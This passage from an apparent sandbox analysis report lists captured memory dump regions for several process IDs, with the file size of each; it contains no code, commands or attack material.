                                                                                                                                      • memory/680-60-0x00007FF9DF2F0000-0x00007FF9DF300000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/972-71-0x0000019C67330000-0x0000019C6735A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/972-75-0x00007FF9DF2F0000-0x00007FF9DF300000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/972-65-0x0000019C67330000-0x0000019C6735A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/972-72-0x0000019C67330000-0x0000019C6735A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/972-73-0x0000019C67330000-0x0000019C6735A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/972-70-0x0000019C67330000-0x0000019C6735A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/972-76-0x0000019C67330000-0x0000019C6735A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/972-74-0x0000019C67330000-0x0000019C6735A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/3424-21-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        32KB

                                                                                                                                      • memory/3424-20-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        32KB

                                                                                                                                      • memory/3424-28-0x00007FFA1D690000-0x00007FFA1D74D000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        756KB

                                                                                                                                      • memory/3424-24-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        32KB

                                                                                                                                      • memory/3424-27-0x00007FFA1F270000-0x00007FFA1F468000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        2.0MB

                                                                                                                                      • memory/3424-26-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        32KB

                                                                                                                                      • memory/3424-29-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        32KB

                                                                                                                                      • memory/3424-22-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        32KB

                                                                                                                                      • memory/3496-475-0x00007FFA00F53000-0x00007FFA00F55000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        8KB

                                                                                                                                      • memory/3496-1172-0x00007FFA00F50000-0x00007FFA01A12000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        10.8MB

                                                                                                                                      • memory/3496-0-0x00007FFA00F53000-0x00007FFA00F55000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        8KB

                                                                                                                                      • memory/3496-19-0x00007FFA1D690000-0x00007FFA1D74D000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        756KB

                                                                                                                                      • memory/3496-78-0x000001D3FCBD0000-0x000001D3FCF42000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        3.4MB

                                                                                                                                      • memory/3496-17-0x000001D3FC580000-0x000001D3FC9C6000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        4.3MB

                                                                                                                                      • memory/3496-505-0x00007FFA00F50000-0x00007FFA01A12000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        10.8MB

                                                                                                                                      • memory/3496-16-0x000001D3C1790000-0x000001D3C17CA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        232KB

                                                                                                                                      • memory/3496-1139-0x00007FFA00F50000-0x00007FFA01A12000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        10.8MB

                                                                                                                                      • memory/3496-18-0x00007FFA1F270000-0x00007FFA1F468000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        2.0MB

                                                                                                                                      • memory/3496-1206-0x00007FFA00F50000-0x00007FFA01A12000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        10.8MB

                                                                                                                                      • memory/3496-15-0x000001D3DC2A0000-0x000001D3DC316000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        472KB

                                                                                                                                      • memory/3496-14-0x00007FFA00F50000-0x00007FFA01A12000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        10.8MB

                                                                                                                                      • memory/3496-13-0x000001D3DBE60000-0x000001D3DBEA4000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        272KB

                                                                                                                                      • memory/3496-12-0x00007FFA00F50000-0x00007FFA01A12000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        10.8MB

                                                                                                                                      • memory/3496-11-0x00007FFA00F50000-0x00007FFA01A12000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        10.8MB

                                                                                                                                      • memory/3496-5-0x000001D3DBD80000-0x000001D3DBDA2000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        136KB